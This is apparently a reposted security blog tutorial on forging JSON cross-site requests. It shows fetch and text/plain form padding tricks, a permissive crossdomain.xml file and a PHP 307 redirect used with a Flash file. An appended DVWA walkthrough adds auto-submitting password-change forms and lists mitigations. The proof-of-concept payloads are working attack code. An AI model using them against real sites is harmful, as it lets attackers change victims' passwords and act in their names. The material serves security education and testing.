【CSRF技巧拓展】————4、Exploiting JSON Cross Site Request Forgery (CSRF) using Flash

Update 2:

For the Case 1, there is possibility in some cases where server reject the request due to extra padding of data, but there is another and best way, using fetch or XHR request we can submit the json formatted data without any limitations, added poc code for the same.

Thanks to Prakash for making me aware of this.

Update 1:

Great work by Evgeniy who edited and compiled the Flash file in a way where users can pass all the information including JSON data, php file & target endpoint via URL parameter, which not only make all those complex procedures simpler but also remove the hectic task to recompilation of flash file each time for the Case 2.

Here is the the updated flash and other files by Evgeniy.

Hello Friends!

Everyone knows about basic csrf attack, if not just go through this owasp page and burp engagement tools have easiest option to create csrf proof of concept for all kind of basic csrf attack including performing csrf via xhr request.

in this post i’m going to talk about csrf scenarios which i encountered many times and seen many researchers from community are curious about it, so i will try clear as much possible!

so this trick comes into play when post request data formatted into json format, eg: {“name”:”test”, “email”:”victim.com”}, which have 2 scenario.

CASE 1:

  • Server looking for json formatted data but don’t validate the Content-type

CASE 2:

  • Server looking for json formatted data and validate the Content-type as well, i.e application/json

Note: This csrf attack only works when the application do only rely either on json formatted data or Content-type application/json, and data format check, if there is any additional csrf token/referer check at place this will not work.

Exploiting Case 1:

This can be achieved with little HTML trick using name attribute with padding some extra data, simply can be done using Fetch request, as we know in this case server is only checking for the post data if it’s correctly formatted or not, if yes it will accept the request regardless the Content-type is set as text/plain

Now assume we have to submit this test data to the vulnerable application: {“name”:”attacker”,”email”:”attacker@gmail.com”}

Updated method: 

<title>JSON CSRF POC</title>
<body>
<center>
<h1> JSON CSRF POC </h1>
<script>
fetch('http://vul-app.com', {method: 'POST', credentials: 'include', headers: {'Content-Type': 'text/plain'}, body: '{"name":"attacker","email":"attacker.com"}'});
</script>
<form action="#">
<input type="button" value="Submit" />
</form>
</center>
</body>
</html>

Source: http://research.rootme.in/forging-content-type-header-with-flash

Old Method: 

<html>
<title>JSON CSRF POC</title>
<center>
<h1> JSON CSRF POC </h1>
<form action=http://vul-app.com method=post enctype="text/plain" >
<input name='{"name":"attacker","email":"attacker@gmail.com","ignore_me":"' value='test"}'type='hidden'>
<input type=submit value="Submit">
</form>
</center>
</html>

This will make post request with valid json formatted data with padding some extra data, if the application don’t care about extra data which happened in most of cases i seen. if not, there is always 2nd way to use.

Source: http://blog.opensecurityresearch.com/2012/02/json-csrf-with-parameter-padding.html

Exploiting Case 2:

Here even if application is validating the Content-type and data format, this attack can be achieved using flash and 307 redirect.

Requirements:

  1. Crafted Flash file
  2. Crossdomain XML file
  3. PHP file with 307 status code

CRAFTED FLASH FILE:

This flash (.swf) file have our json formatted data which attacker have to post on the target application, and link to hosted php file in it.

Here is the test SWF file, you can download and edit the contents as per your need, i do use FFDec on Windows for editing and compiling the flash file, you can check others based on your environment.

CROSSDOMAIN XML FILE:

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>

This file should be hosted on attackers website’s root directory, so flash file can make request to attacker’s host.
Note: You don’t need crossdomain file if  flash file & redirector page is on same domain.

PHP FILE WITH 307 STATUS CODE:

<?php

// redirect automatically

header("Location: https://victim.com/user/endpoint/", true, 307);

?>

Flash file request for this php file, this will make 307 redirect to mentioned application endpoint, and as 307 is special redirect which will post the JSON data as well which got received from the flash file to the target endpoint and CSRF will take place successfully.

Here is the public report #44146 by @avlidienbrunn for the same.

Note: As this is based on flash, so flash should be installed in browser to make it work, which is very normal for now but may not be in future.

do let me know if you have any queries in comment section or tweet about it here , and thanks to Parth for the proof reading.

 

### DVWA CSRF Vulnerability Walkthrough and Explanation #### Understanding CSRF in DVWA Cross-Site Request Forgery (CSRF) is a type of attack that tricks the victim into submitting a malicious request. It forces an end user to execute unwanted actions on a web application in which they are authenticated[^1]. In DVWA, this vulnerability can be explored at different difficulty levels including Low, Medium, High, and Impossible. For the **Low level**, no token or any form of validation exists. An attacker could craft a simple HTML page with hidden fields mimicking the target's POST data structure: ```html <form action="http://192.168.112.188/dvwa/vulnerabilities/csrf/" method="POST"> <input type="hidden" name="password_new" value="hacked"/> <input type="hidden" name="password_confirm" value="hacked"/> <input type="submit" value="Change Password"/> </form> <script>document.forms[0].submit();</script> ``` At the **Medium level**, although there might not be strict anti-CSRF tokens implemented, other defenses such as checking HTTP referer headers may apply. However, these checks often prove insufficient against sophisticated attacks because attackers can manipulate browser behavior through various means like embedding images pointing to internal URLs within external pages[^2]. In more advanced scenarios—like those found under 'High' settings—the presence of unique per-session tokens makes exploitation significantly harder but still possible via techniques involving session fixation or exploiting XSS flaws elsewhere on the site. The ultimate goal when configuring security measures should always aim towards achieving what DVWA terms "Impossible". Here, comprehensive protections prevent successful forgery attempts by ensuring each legitimate operation includes unpredictable values tied directly back to individual sessions. #### Demonstrating Exploitation Process To demonstrate how one exploits CSRF vulnerabilities present in lower difficulties using DVWA: - Create an HTML file named `change_password.html` containing crafted forms targeting password change functionality. ```html <!-- Example for low-level CSRF --> <!DOCTYPE html> <html lang="en"> <head><title>Exploit Page</title></head> <body onload='document.getElementById("csrf").submit()'> <form id="csrf" action="http://target-ip-address/dvwa/vulnerabilities/csrf/" method="POST"> <input type="text" name="password_new" value="newpass"/> <input type="text" name="password_confirm" value="newpass"/> <input type="submit" name="Change" /> </form> </body> </html> ``` Upon loading this exploit page while logged into DVWA, it automatically submits the form changing your account’s credentials without explicit consent from you. #### Mitigation Strategies Against CSRF Attacks Implementing robust countermeasures involves several best practices: - Utilizing synchronized cookie patterns where requests must include both cookies and matching parameters sent along with them. - Generating cryptographically secure random numbers used once per transaction known as synchronizer tokens stored server-side during login then validated upon submission. - Employing double submit cookies strategy wherein clients send two copies of their session identifier – one inside standard Cookie header another explicitly included among submitted variables. --related questions-- 1. What specific mechanisms does DVWA implement across its varying CSRF challenge complexities? 2. How do modern frameworks address potential CSRF threats beyond traditional methods discussed here? 3. Can machine learning algorithms enhance detection rates for novel types of cross-site scripting attacks related to CSRF? 4. Are there real-world examples demonstrating effective bypasses around contemporary anti-CSRF implementations?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值